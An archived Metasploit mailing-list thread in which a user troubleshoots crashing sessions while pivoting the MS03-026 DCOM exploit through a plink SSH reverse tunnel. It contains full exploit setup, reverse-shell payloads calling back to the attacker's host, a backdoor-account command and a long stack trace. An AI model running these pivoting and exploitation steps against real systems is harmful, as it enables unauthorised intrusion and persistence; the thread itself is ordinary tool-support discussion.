Metasploit mailing list archives

Re: Interactive payloads fail through SSH tunnel

From: David Kennedy <kennedyd013 () gmail com>
Date: Sat, 23 Feb 2013 21:48:43 -0500

Set rhost to 0.0.0.0 or 127.0.0.2. 127.0.0.1 has trouble.
On Feb 23, 2013 9:41 PM, "Mike Jones!" <property.of.mike.jones () gmail com>
wrote:

Hello,

Meterpreter crashes when used through an SSH tunnel. I'm sure it is me
doing something stupid so was hoping somebody could point out my mistake.

I start with a meterpreter shell on an unprivileged account, then set up
SSH tunnel for port 135 so I can do MS03-026 exploit against DCOM.

Probably good to mention too that there is no NAT between the two systems.

meterpreter > shell
Process 1936 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\foobar>plink -l root -pw mystupidpassword -R 135:localhost:135
192.168.12.48

My system is 192.168.12.48. Tunnel is created and target has service up
and running on its port 135. Now I set up exploit in separate metasploit
instance.

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf  exploit(ms03_026_dcom) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf  exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms03_026_dcom) > set LHOST 192.168.12.48
LHOST => 192.168.12.48
msf  exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  127.0.0.1        yes       The target address
   RPORT  135              yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread,
process, none
   LHOST     192.168.12.48    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


Now I run exploit and it is successful, payload lands, meterpreter shell
opens.  Then it crashes when I do anything.

msf  exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.12.48:4444
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Sending exploit ...
[*] Sending stage (752128 bytes) to 192.168.13.203

meterpreter > getuid
[-] Session manipulation failed: Validation failed: Address is reserved
["/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/validations.rb:56:in
`save!'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/attribute_methods/dirty.rb:33:in
`save!'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:246:in
`block in save!'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:295:in
`block in with_transaction_returning_status'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract/database_statements.rb:192:in
`transaction'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:208:in
`transaction'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:293:in
`with_transaction_returning_status'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:246:in
`save!'", "/opt/metasploit/msf3/lib/msf/core/db.rb:349:in `block in
report_host'",
"/opt/metasploit/msf3/lib/msf/core/patches/active_record.rb:22:in
`with_connection'", "/opt/metasploit/msf3/lib/msf/core/db.rb:295:in
`report_host'", "/opt/metasploit/msf3/lib/msf/core/db.rb:1904:in `block in
report_event'",
"/opt/metasploit/msf3/lib/msf/core/patches/active_record.rb:22:in
`with_connection'", "/opt/metasploit/msf3/lib/msf/core/db.rb:1898:in
`report_event'", "/opt/metasploit/msf3/lib/msf/core/framework.rb:222:in
`report_event'", "/opt/metasploit/msf3/lib/msf/core/framework.rb:331:in
`session_event'", "/opt/metasploit/msf3/lib/msf/core/framework.rb:408:in
`block in on_session_output'",
"/opt/metasploit/msf3/lib/msf/core/framework.rb:407:in `each'",
"/opt/metasploit/msf3/lib/msf/core/framework.rb:407:in
`on_session_output'",
"/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:183:in `block in
method_missing'",
"/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:181:in `each'",
"/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:181:in
`method_missing'",
"/opt/metasploit/msf3/lib/msf/core/session_manager.rb:238:in `block in
register'", "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:271:in `call'",
"/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:271:in `print_error'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:436:in
`unknown_command'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:411:in
`run_single'",
"/opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console.rb:68:in `block
in interact'", "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:190:in
`call'", "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:190:in `run'",
"/opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console.rb:66:in
`interact'",
"/opt/metasploit/msf3/lib/msf/base/sessions/meterpreter.rb:431:in
`_interact'", "/opt/metasploit/msf3/lib/rex/ui/interactive.rb:49:in
`interact'",
"/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/core.rb:1596:in
`cmd_sessions'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in
`run_command'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in
run_single'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in
`run_single'",
"/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:179:in
`cmd_exploit'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in
`run_command'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in
run_single'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in
`run_single'", "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:200:in
`run'", "./msfconsole:148:in `<main>'"]


This isn't limited to meterpreter. I tried different payload for just
shell and still crashed.

msf  exploit(ms03_026_dcom) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf  exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.12.48:9090
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Sending exploit ...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user test test /add
[-] Session manipulation failed: Validation failed: Address is reserved
... {snipped}

Though a non-interactive payload works ok.

msf  exploit(ms03_026_dcom) > set payload windows/adduser
payload => windows/adduser
msf  exploit(ms03_026_dcom) > set USER testuser
USER => testuser
msf  exploit(ms03_026_dcom) > set PASS Testpass@1
PASS => Testpass@1
msf  exploit(ms03_026_dcom) > exploit

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135]
...
[*] Sending exploit ...
msf  exploit(ms03_026_dcom) >

In that case, new user 'testuser' was added.

I saw a couple threads with this same error but didn't gleam a simple
solution from them. There are also lots of this error on pastebin.

https://community.rapid7.com/thread/2046
https://community.rapid7.com/thread/1856

Also saw an example where the person set ExitOnSession false, tried that,
still crashes.

Guys help I am stupid what am I doing wrong?

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

Interactive payloads fail through SSH tunnel Mike Jones! (Feb 23)
- Re: Interactive payloads fail through SSH tunnel David Kennedy (Feb 23)
  - Re: Interactive payloads fail through SSH tunnel Mike Jones! (Feb 23)
    - Re: Interactive payloads fail through SSH tunnel David Kennedy (Feb 23)
    - Re: Interactive payloads fail through SSH tunnel Tod Beardsley (Feb 24)